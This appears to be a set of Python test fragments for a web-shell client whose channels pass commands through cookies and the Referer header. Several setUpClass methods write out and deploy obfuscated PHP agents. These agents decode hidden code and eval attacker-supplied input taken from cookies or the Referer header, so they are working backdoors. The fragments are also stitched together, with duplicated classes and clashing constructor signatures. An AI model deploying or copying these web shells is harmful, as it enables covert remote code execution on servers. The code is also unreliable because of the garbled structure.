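            ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'),
            ('User-Agent', 'CLIENT'),
            ('X-Other-Cookie', 'OTHER')
        ]
        headers_string = self.channel.send('print_r(getallheaders());')[0]

        # Raw strings: the backslashes belong to the regex, not to Python.
        self.assertRegexpMatches(
            headers_string,
            r'\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+'
        )
        self.assertRegexpMatches(headers_string, r'\[User-Agent\] => CLIENT')
        self.assertRegexpMatches(headers_string, r'\[X-Other-Cookie\] => OTHER')

        self.channel.channel_loaded.additional_headers = []

    def test_wrong_cert(self):
        """Check that a request to an HTTPS URL addressed by IP does not raise.

        NOTE(review): the URL uses a bare IP, so the server certificate
        presumably cannot match it; a pass means the channel tolerates that.
        Confirm this is the intended behaviour.
        """
        ip = _get_google_ip()
        if not ip:
            # Report the missing precondition instead of passing silently.
            self.skipTest('no IP address available for the certificate test')

        url = 'https://%s/nonexistent' % (ip)
        channel = Channel('LegacyCookie', {'url': url, 'password': 'none'})
        try:
            channel.send('echo("1");')
        except Exception as e:
            self.fail("LegacyCookie test_wrong_cert exception\n%s" % (str(e)))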
def run(self):
    """Remove an entry point from ``channels`` beside the session file.

    Returns:
        A confirmation string naming the URL that was removed.
    """
    session_dir = os.path.dirname(self.session['path'])
    cchannel = os.path.join(session_dir, "channels")

    url = self.args["url"]
    Channel.del_from_chanFile(url, cchannel)

    return "Entry point " + url + " removed"
def setUp(self):
    """Create a fresh StegaRef channel from the class URL and password."""
    options = {'url': self.url, 'password': self.password}
    self.channel = Channel('StegaRef', options)
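class LegacyReferrerChannel(BaseTest):
    """Exercise the LegacyReferrer channel against an agent deployed per class."""

    def setUp(self):
        """Create a fresh LegacyReferrer channel for every test."""
        self.channel = Channel('LegacyReferrer', {
            'url': self.url,
            'password': self.password
        })

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def setUpClass(cls):
        """Deploy the fixed LegacyReferrer agent fixture at ``cls.path``.

        Raises:
            DevException: if ``config.script_folder`` does not report the
                expected permissions.
        """
        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions, comparing just the
        # last 3 digits
        # NOTE(review): the command templates from `config` are run through
        # a shell; keep the templates and interpolated paths trusted.
        if (subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip()[-3:]
                != config.script_folder_expected_perms[-3:]):
            raise DevException(
                "Error: give the required permissions to the folder \'%s\'"
                % config.script_folder)

        # Test fixture: PHP agent stub, deployed for this class only and
        # removed again in tearDownClass.
        obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        # mkstemp() returns an open descriptor; close it so it is not leaked.
        os.close(tmp_handler)
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        # NOTE(review): mode 0777 makes the deployed file world-writable;
        # acceptable only in a disposable test environment.
        subprocess.check_call(config.cmd_env_chmod_s_s % ('0777', cls.path),
                              shell=True)

    @classmethod
    def tearDownClass(cls):
        """Remove the deployed agent file if it is still present."""
        # Check the agent presence, could be already deleted
        if os.path.isfile(cls.path):
            subprocess.check_call(config.cmd_env_remove_s % cls.path,
                                  shell=True)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)

    def test_additional_headers(self):
        """Check how user-supplied headers show up in the server's view."""
        self.channel.channel_loaded.additional_headers = [
            ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4'),
            ('Referer', 'REFERER'),
            ('X-Other-Cookie', 'OTHER')
        ]
        headers_string = self.channel.send('print_r(getallheaders());')[0]

        self.assertIn('[Cookie] => C1=F1; C2=F2; C3=F3; C4=F4', headers_string)
        # NOTE(review): the header set above is 'REFERER' but the check
        # looks for 'REFERER1'; confirm which value was meant.
        self.assertNotIn('REFERER1', headers_string)
        self.assertIn('[X-Other-Cookie] => OTHER', headers_string)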
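class LegacyCookieChannel(BaseTest):
    """Exercise the LegacyCookie channel against an agent deployed per class."""

    def setUp(self):
        """Create a fresh LegacyCookie channel for every test."""
        self.channel = Channel(self.url, self.password, 'LegacyCookie')

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def setUpClass(cls):
        """Deploy the fixed LegacyCookie agent fixture at ``cls.path``.

        Raises:
            DevException: if ``config.script_folder`` does not report the
                expected permissions.
        """
        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions
        # NOTE(review): the command templates from `config` are run through
        # a shell; keep the templates and interpolated paths trusted.
        if (subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip() != config.script_folder_expected_perms):
            raise DevException(
                "Error: give to the http user full permissions to the folder \'%s\'"
                % config.script_folder)

        # Test fixture: fixed, obfuscated PHP agent, deployed for this class
        # only and removed again in tearDownClass.
        obfuscated = """<?php $xcrd="mVwbeoGFjZShhceonJheSgnL1teXHc9XeoHeoNdLycsJy9ccy8nKSwgYXeoJyYXkeooJycsJysnKSwgam"; $dqlt="JGMeo9J2NvdW50JzskYT0kX0NPT0tJRTtpeoZihyZXNldCgkeoYSk9PSdhcycgJeoiYeogJGMoeoJGEpP"; $lspg="9pbihhcnJheeoV9zbeoGljZSgeokYeoSeowkYygkYSktMykpKSkpO2VeojaG8gJzwvJyeo4kay4nPic7fQ=="; $tylz="jMpeyRreoPeoSeodkYXeoNkJztlY2hvICc8Jy4kay4nPieoc7ZXZhbeoChiYXNlNjRfZGVjb2RlKHByZWdfeoc"; $toja = str_replace("z","","zsztr_zrzezpzlazce"); $apod = $toja("q", "", "qbaqsqeq6q4_qdecodqe"); $fyqt = $toja("uw","","uwcruweuwauwtuwe_funuwcuwtuwiouwn"); $sify = $fyqt('', $apod($toja("eo", "", $dqlt.$tylz.$xcrd.$lspg))); $sify(); ?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        # mkstemp() returns an open descriptor; close it so it is not leaked.
        os.close(tmp_handler)
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        # NOTE(review): mode 777 makes the deployed file world-writable;
        # acceptable only in a disposable test environment.
        subprocess.check_call(config.cmd_env_chmod_s_s % ('777', cls.path),
                              shell=True)

    @classmethod
    def tearDownClass(cls):
        """Remove the deployed agent file if it is still present."""
        # Check the agent presence, could be already deleted
        if os.path.isfile(cls.path):
            subprocess.check_call(config.cmd_env_remove_s % cls.path,
                                  shell=True)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)

    def test_additional_headers(self):
        """Check how user-supplied headers show up in the server's view."""
        self.channel.channel_loaded.additional_headers = [
            ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'),
            ('User-Agent', 'CLIENT'),
            ('X-Other-Cookie', 'OTHER')
        ]
        headers_string = self.channel.send('print_r(getallheaders());')[0]

        # Raw strings: the backslashes belong to the regex, not to Python.
        self.assertRegexpMatches(
            headers_string,
            r'\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+'
        )
        self.assertRegexpMatches(headers_string, r'\[User-Agent\] => CLIENT')
        self.assertRegexpMatches(headers_string, r'\[X-Other-Cookie\] => OTHER')

        self.channel.channel_loaded.additional_headers = []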
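class LegacyCookieChannel(BaseTest):
    """Exercise the LegacyCookie channel against the agent at ``url``."""

    url = config.base_url + '/test_channels/legacycookie_php.php'

    def setUp(self):
        """Create a fresh LegacyCookie channel for every test."""
        self.channel = Channel('LegacyCookie', {
            'url': self.url,
            'password': self.password
        })

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)

    def test_additional_headers(self):
        """Check how user-supplied headers show up in the server's view."""
        self.channel.channel_loaded.additional_headers = [
            ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'),
            ('User-Agent', 'CLIENT'),
            ('X-Other-Cookie', 'OTHER')
        ]
        headers_string = self.channel.send('print_r(getallheaders());')[0]

        # Raw strings: the backslashes belong to the regex, not to Python.
        self.assertRegexpMatches(
            headers_string,
            r'\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+'
        )
        self.assertRegexpMatches(headers_string, r'\[User-Agent\] => CLIENT')
        self.assertRegexpMatches(headers_string, r'\[X-Other-Cookie\] => OTHER')

        self.channel.channel_loaded.additional_headers = []

    def test_wrong_cert(self):
        """Check that a request to an HTTPS URL addressed by IP does not raise.

        NOTE(review): the URL uses a bare IP, so the server certificate
        presumably cannot match it; a pass means the channel tolerates that.
        Confirm this is the intended behaviour.
        """
        ip = _get_google_ip()
        if not ip:
            # Report the missing precondition instead of passing silently.
            self.skipTest('no IP address available for the certificate test')

        url = 'https://%s/nonexistent' % (ip)
        channel = Channel('LegacyCookie', {'url': url, 'password': 'none'})
        try:
            channel.send('echo("1");')
        except Exception as e:
            self.fail("LegacyCookie test_wrong_cert exception\n%s" % (str(e)))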
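class LegacyReferrerChannel(BaseTest):
    """Exercise the LegacyReferrer channel against the agent at ``url``."""

    url = config.base_url + '/test_channels/legacyreferrer.php'
    password = '******'

    def setUp(self):
        """Create a fresh LegacyReferrer channel for every test."""
        self.channel = Channel('LegacyReferrer', {
            'url': self.url,
            'password': self.password
        })

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)

    def test_additional_headers(self):
        """Check how user-supplied headers show up in the server's view."""
        self.channel.channel_loaded.additional_headers = [
            ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4'),
            ('Referer', 'REFERER'),
            ('X-Other-Cookie', 'OTHER')
        ]
        headers_string = self.channel.send('print_r(getallheaders());')[0]

        self.assertIn('[Cookie] => C1=F1; C2=F2; C3=F3; C4=F4', headers_string)
        # NOTE(review): the header set above is 'REFERER' but the check
        # looks for 'REFERER1'; confirm which value was meant.
        self.assertNotIn('REFERER1', headers_string)
        self.assertIn('[X-Other-Cookie] => OTHER', headers_string)

    def test_wrong_cert(self):
        """Check that a request to an HTTPS URL addressed by IP does not raise.

        NOTE(review): the URL uses a bare IP, so the server certificate
        presumably cannot match it; a pass means the channel tolerates that.
        Confirm this is the intended behaviour.
        """
        ip = _get_google_ip()
        if not ip:
            # Report the missing precondition instead of passing silently.
            self.skipTest('no IP address available for the certificate test')

        url = 'https://%s/nonexistent' % (ip)
        channel = Channel('LegacyReferrer', {'url': url, 'password': 'none'})
        try:
            channel.send('echo("1");')
        except Exception as e:
            self.fail("LegacyReferrer test_wrong_cert exception\n%s" % (str(e)))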
def setUp(self):
    """Create a StegaRef channel aimed at the ``stegaref.php`` test agent."""
    agent_url = config.base_url + '/test_channels/stegaref.php'
    options = {'url': agent_url, 'password': self.password}
    self.channel = Channel('StegaRef', options)
def setUp(self):
    """Create a fresh LegacyReferrer channel from the class URL and password."""
    url, password = self.url, self.password
    self.channel = Channel(url, password, 'LegacyReferrer')
def setUp(self):
    """Create a fresh LegacyCookie channel from the class URL and password."""
    options = {'url': self.url, 'password': self.password}
    self.channel = Channel('LegacyCookie', options)
def setUp(self):
    """Create a fresh StegaRef channel from the class URL and password."""
    url, password = self.url, self.password
    self.channel = Channel(url, password, 'StegaRef')
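class LegacyCookieChannel(BaseTest):
    """Exercise the LegacyCookie channel against an agent deployed per class."""

    def setUp(self):
        """Create a fresh LegacyCookie channel for every test."""
        self.channel = Channel(self.url, self.password, 'LegacyCookie')

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def setUpClass(cls):
        """Deploy the fixed LegacyCookie agent fixture at ``cls.path``.

        Raises:
            DevException: if ``config.script_folder`` does not report the
                expected permissions.
        """
        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions
        # NOTE(review): the command templates from `config` are run through
        # a shell; keep the templates and interpolated paths trusted.
        if (subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip() != config.script_folder_expected_perms):
            raise DevException(
                "Error: give to the http user full permissions to the folder \'%s\'"
                % config.script_folder)

        # Test fixture: fixed, obfuscated PHP agent, deployed for this class
        # only and removed again in tearDownClass.
        obfuscated = """<?php $xcrd="mVwbeoGFjZShhceonJheSgnL1teXHc9XeoHeoNdLycsJy9ccy8nKSwgYXeoJyYXkeooJycsJysnKSwgam"; $dqlt="JGMeo9J2NvdW50JzskYT0kX0NPT0tJRTtpeoZihyZXNldCgkeoYSk9PSdhcycgJeoiYeogJGMoeoJGEpP"; $lspg="9pbihhcnJheeoV9zbeoGljZSgeokYeoSeowkYygkYSktMykpKSkpO2VeojaG8gJzwvJyeo4kay4nPic7fQ=="; $tylz="jMpeyRreoPeoSeodkYXeoNkJztlY2hvICc8Jy4kay4nPieoc7ZXZhbeoChiYXNlNjRfZGVjb2RlKHByZWdfeoc"; $toja = str_replace("z","","zsztr_zrzezpzlazce"); $apod = $toja("q", "", "qbaqsqeq6q4_qdecodqe"); $fyqt = $toja("uw","","uwcruweuwauwtuwe_funuwcuwtuwiouwn"); $sify = $fyqt('', $apod($toja("eo", "", $dqlt.$tylz.$xcrd.$lspg))); $sify(); ?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        # mkstemp() returns an open descriptor; close it so it is not leaked.
        os.close(tmp_handler)
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        # NOTE(review): mode 777 makes the deployed file world-writable;
        # acceptable only in a disposable test environment.
        subprocess.check_call(config.cmd_env_chmod_s_s % ('777', cls.path),
                              shell=True)

    @classmethod
    def tearDownClass(cls):
        """Remove the deployed agent file if it is still present."""
        # Check the agent presence, could be already deleted
        if os.path.isfile(cls.path):
            subprocess.check_call(config.cmd_env_remove_s % cls.path,
                                  shell=True)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)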
def setUp(self):
    """Create a fresh LegacyCookie channel from the class URL and password."""
    url, password = self.url, self.password
    self.channel = Channel(url, password, 'LegacyCookie')
def setUp(self):
    """Create a fresh LegacyReferrer channel from the class URL and password."""
    options = {'url': self.url, 'password': self.password}
    self.channel = Channel('LegacyReferrer', options)
def setUp(self):
    """Create a fresh channel from the class URL and password."""
    url, password = self.url, self.password
    self.channel = Channel(url, password)
def run(self):
    """Add an entry point to ``channels`` beside the session file.

    Returns:
        A confirmation string naming the URL and password that were added.
    """
    session_dir = os.path.dirname(self.session['path'])
    cchannel = os.path.join(session_dir, "channels")

    url = self.args["url"]
    password = self.args["password"]
    Channel.add_to_chan(url, password, cchannel)

    # NOTE(review): the confirmation echoes the password in clear text, so
    # it ends up wherever this return value is printed or logged.
    return "Entry point " + url + ":" + password + " added"
def setUp(self):
    """Create a fresh ObfPost channel from the class URL and password."""
    options = {'url': self.url, 'password': self.password}
    self.channel = Channel('ObfPost', options)
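class LegacyReferrerChannel(BaseTest):
    """Exercise the LegacyReferrer channel against an agent deployed per class."""

    def setUp(self):
        """Create a fresh LegacyReferrer channel for every test."""
        self.channel = Channel(self.url, self.password, 'LegacyReferrer')

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def setUpClass(cls):
        """Deploy the fixed LegacyReferrer agent fixture at ``cls.path``.

        Raises:
            DevException: if ``config.script_folder`` does not report the
                expected permissions.
        """
        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions
        # NOTE(review): the command templates from `config` are run through
        # a shell; keep the templates and interpolated paths trusted.
        if (subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip() != config.script_folder_expected_perms):
            raise DevException(
                "Error: give to the http user full permissions to the folder \'%s\'"
                % config.script_folder)

        # Test fixture: PHP agent stub, deployed for this class only and
        # removed again in tearDownClass.
        obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        # mkstemp() returns an open descriptor; close it so it is not leaked.
        os.close(tmp_handler)
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        # NOTE(review): mode 777 makes the deployed file world-writable;
        # acceptable only in a disposable test environment.
        subprocess.check_call(config.cmd_env_chmod_s_s % ('777', cls.path),
                              shell=True)

    @classmethod
    def tearDownClass(cls):
        """Remove the deployed agent file if it is still present."""
        # Check the agent presence, could be already deleted
        if os.path.isfile(cls.path):
            subprocess.check_call(config.cmd_env_remove_s % cls.path,
                                  shell=True)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)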